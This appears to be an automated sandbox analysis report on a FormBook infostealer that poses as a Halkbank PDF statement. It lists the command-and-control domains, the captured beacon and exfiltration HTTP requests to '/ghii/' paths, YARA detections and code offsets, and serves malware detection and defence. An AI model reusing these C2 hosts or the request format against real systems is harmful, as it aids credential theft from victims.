          Source: explorer.exe, 00000004.00000003.448170741.0000000008499000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ladybillplanet.com/ghii/
          Source: explorer.exe, 00000004.00000003.446712622.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.578814655.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.548961361.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.561149188.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.553487749.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.448170741.0000000008499000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nortonseecurity.com
          Source: explorer.exe, 00000004.00000003.448170741.0000000008499000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nortonseecurity.com/ghii/
          Source: explorer.exe, 00000004.00000003.553487749.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.448170741.0000000008499000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.octohoki.net
          Source: explorer.exe, 00000004.00000003.448170741.0000000008499000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.octohoki.net/ghii/
          Source: colorcpl.exe, 00000005.00000002.570570309.0000000005C2C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.searchvity.com/
          Source: colorcpl.exe, 00000005.00000002.570570309.0000000005C2C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.searchvity.com/?dn=
          Source: explorer.exe, 00000004.00000003.446712622.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.578814655.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.548961361.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.561149188.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.553487749.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.448170741.0000000008499000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sem-jobs.com
          Source: explorer.exe, 00000004.00000003.448170741.0000000008499000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sem-jobs.com/ghii/
          Source: explorer.exe, 00000004.00000003.446712622.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.578814655.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.548961361.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.561149188.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.553487749.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.448170741.0000000008499000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wenzid4.top
          Source: explorer.exe, 00000004.00000003.448170741.0000000008499000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wenzid4.top/ghii/
          Source: explorer.exe, 00000004.00000003.446712622.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.578814655.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.548961361.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.561149188.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.553487749.0000000008494000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.448170741.0000000008499000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yeah-go.com
          Source: explorer.exe, 00000004.00000003.448170741.0000000008499000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yeah-go.com/ghii/
          Source: -912K03JO.5.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: -912K03JO.5.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: -912K03JO.5.drString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: colorcpl.exe, 00000005.00000003.383541410.0000000007BF6000.00000004.00000020.00020000.00000000.sdmp, -912K03JO.5.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: -912K03JO.5.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: colorcpl.exe, 00000005.00000002.570570309.0000000005A9A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Montserrat:200
          Source: colorcpl.exe, 00000005.00000003.383541410.0000000007BF6000.00000004.00000020.00020000.00000000.sdmp, -912K03JO.5.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
          Source: colorcpl.exe, 00000005.00000003.383541410.0000000007BF6000.00000004.00000020.00020000.00000000.sdmp, -912K03JO.5.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
          Source: colorcpl.exe, 00000005.00000003.383541410.0000000007BF6000.00000004.00000020.00020000.00000000.sdmp, -912K03JO.5.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
          Source: colorcpl.exe, 00000005.00000003.383541410.0000000007BF6000.00000004.00000020.00020000.00000000.sdmp, -912K03JO.5.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
          Source: colorcpl.exe, 00000005.00000003.383541410.0000000007BF6000.00000004.00000020.00020000.00000000.sdmp, -912K03JO.5.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: unknownHTTP traffic detected: POST /ghii/ HTTP/1.1Host: www.energybig.xyzConnection: closeContent-Length: 185Cache-Control: no-cacheOrigin: http://www.energybig.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.energybig.xyz/ghii/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 31 4c 4d 3d 4b 75 47 55 64 7a 32 39 51 61 76 34 54 6a 52 59 70 51 55 4d 57 62 6d 6d 78 61 4d 6b 79 5f 39 55 4e 6c 47 4b 61 56 4c 4b 45 49 63 36 6f 61 33 38 41 59 4f 7a 63 75 63 4f 67 76 50 7a 63 6a 32 59 63 59 75 70 38 5f 51 4d 71 55 61 38 69 69 71 32 38 63 37 5a 75 59 45 6c 68 79 38 6f 30 4f 39 71 50 67 4b 52 43 6c 57 50 30 65 39 31 6f 2d 6a 4c 48 4f 6c 4d 6d 79 41 46 70 56 46 6b 35 37 6b 5f 63 56 30 79 57 41 48 53 4d 39 63 35 69 59 46 42 54 43 61 63 43 4a 41 71 76 56 47 2d 57 30 44 34 78 68 34 74 48 62 65 63 57 2d 5a 4f 44 76 36 55 55 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 1LM=KuGUdz29Qav4TjRYpQUMWbmmxaMky_9UNlGKaVLKEIc6oa38AYOzcucOgvPzcj2YcYup8_QMqUa8iiq28c7ZuYElhy8o0O9qPgKRClWP0e91o-jLHOlMmyAFpVFk57k_cV0yWAHSM9c5iYFBTCacCJAqvVG-W0D4xh4tHbecW-ZODv6UUA).
          Source: unknownDNS traffic detected: queries for: www.wenzid4.top
          Source: global trafficHTTP traffic detected: GET /ghii/?1LM=MOY5/0rZkCSn1x8B5kGxcu4kjN12BC26NMBU4rUAiJ09dU/WDm+Fx0Du9tK3DtQGeLOXEwxSHBLi0tUrRAF6AgWuiPHLLIEAEQ==&kTj=94JTJ5e-oG HTTP/1.1Host: www.wenzid4.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ghii/?1LM=Hsu0eFbPaPXvQj1driY9Qb+UxIEGydZDMi24Zx/KBNJzrILAD6eOCtsvvO79CgG5LYmF38wKy0LUujLv+r7tqaEj2Tcyyr5eEg==&kTj=94JTJ5e-oG HTTP/1.1Host: www.energybig.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ghii/?1LM=b9pmEiWE3A9hICRLJ48/0GIWTdcguNEQkRUuEoMGZR2jfpcIS7+82C+h9uoa2hbDMoucG0FStkg6AqIGzw0t5RnkbE2XBG6Jig==&kTj=94JTJ5e-oG HTTP/1.1Host: www.genuineinsights.cloudConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ghii/?1LM=mbPzPtZ0Er8L5pad82wwGh9ocqcT3a4VC5lEcjpUbblZCC9rEfNiJ4Zzn4lMJLJJ2TaA1od8FsE8LCEUSFIleqyuhYHktxRXxg==&kTj=94JTJ5e-oG HTTP/1.1Host: www.octohoki.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ghii/?1LM=nNwsU5RDSztrDyxRHILLs79A8ojzBVjbvYOj2DqB/Q3esj8ZmeFlGSz1p8lC+bcuH8jypYjqHnnMah8No3XpEJ5LEY61yEIXoQ==&kTj=94JTJ5e-oG HTTP/1.1Host: www.ladybillplanet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405809

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.vokkqsp.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.vokkqsp.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.344373835.00000000004F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.343757379.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.568126505.0000000001270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.568031477.0000000001240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.344609982.0000000000A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.567461782.0000000000DB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 3.2.vokkqsp.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.vokkqsp.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.vokkqsp.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.vokkqsp.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.344373835.00000000004F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.344373835.00000000004F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.343757379.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.343757379.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.568126505.0000000001270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.568126505.0000000001270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.568031477.0000000001240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.568031477.0000000001240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.344609982.0000000000A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.344609982.0000000000A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.567461782.0000000000DB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.567461782.0000000000DB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: 3.2.vokkqsp.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.vokkqsp.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.vokkqsp.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.vokkqsp.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.344373835.00000000004F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.344373835.00000000004F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.343757379.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.343757379.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.568126505.0000000001270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.568126505.0000000001270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.568031477.0000000001240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.568031477.0000000001240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.344609982.0000000000A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.344609982.0000000000A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.567461782.0000000000DB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.567461782.0000000000DB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640
          Source: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_00406D5F0_2_00406D5F
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 1_2_0043D08A1_2_0043D08A
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 1_2_004191731_2_00419173
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 1_2_0043311F1_2_0043311F
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 1_2_004321201_2_00432120
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 1_2_004051F31_2_004051F3
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 1_2_0042C27E1_2_0042C27E
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 1_2_0041A2A21_2_0041A2A2
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 1_2_0043C3411_2_0043C341
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 1_2_004194BB1_2_004194BB
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 1_2_0043D4BF1_2_0043D4BF
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 1_2_0041A6161_2_0041A616
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 1_2_004326301_2_00432630
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 1_2_004198121_2_00419812
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 1_2_0043C83D1_2_0043C83D
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 1_2_0041AA461_2_0041AA46
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 1_2_00432A701_2_00432A70
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 1_2_00419BAF1_2_00419BAF
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 1_2_0043CC551_2_0043CC55
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 1_2_00438CB41_2_00438CB4
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 1_2_00430D721_2_00430D72
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 1_2_00428E2C1_2_00428E2C
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 1_2_00419F3D1_2_00419F3D
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_004058033_2_00405803
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_004038833_2_00403883
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00401B603_2_00401B60
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00421B3F3_2_00421B3F
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00401C703_2_00401C70
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_004055E23_2_004055E2
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_004055E33_2_004055E3
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_004206D33_2_004206D3
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_004017C03_2_004017C0
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_0040BFCE3_2_0040BFCE
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_0040BFD33_2_0040BFD3
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_0040BF8D3_2_0040BF8D
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_004017B33_2_004017B3
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A920A03_2_00A920A0
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00B320A83_2_00B320A8
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A7B0903_2_00A7B090
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00B328EC3_2_00B328EC
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00B3E8243_2_00B3E824
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00B210023_2_00B21002
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A841203_2_00A84120
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A6F9003_2_00A6F900
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00B322AE3_2_00B322AE
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A9EBB03_2_00A9EBB0
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00B2DBD23_2_00B2DBD2
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00B32B283_2_00B32B28
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A7841F3_2_00A7841F
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00B2D4663_2_00B2D466
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A925813_2_00A92581
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A7D5E03_2_00A7D5E0
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00B325DD3_2_00B325DD
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A60D203_2_00A60D20
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00B32D073_2_00B32D07
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00B31D553_2_00B31D55
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00B32EF73_2_00B32EF7
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A86E303_2_00A86E30
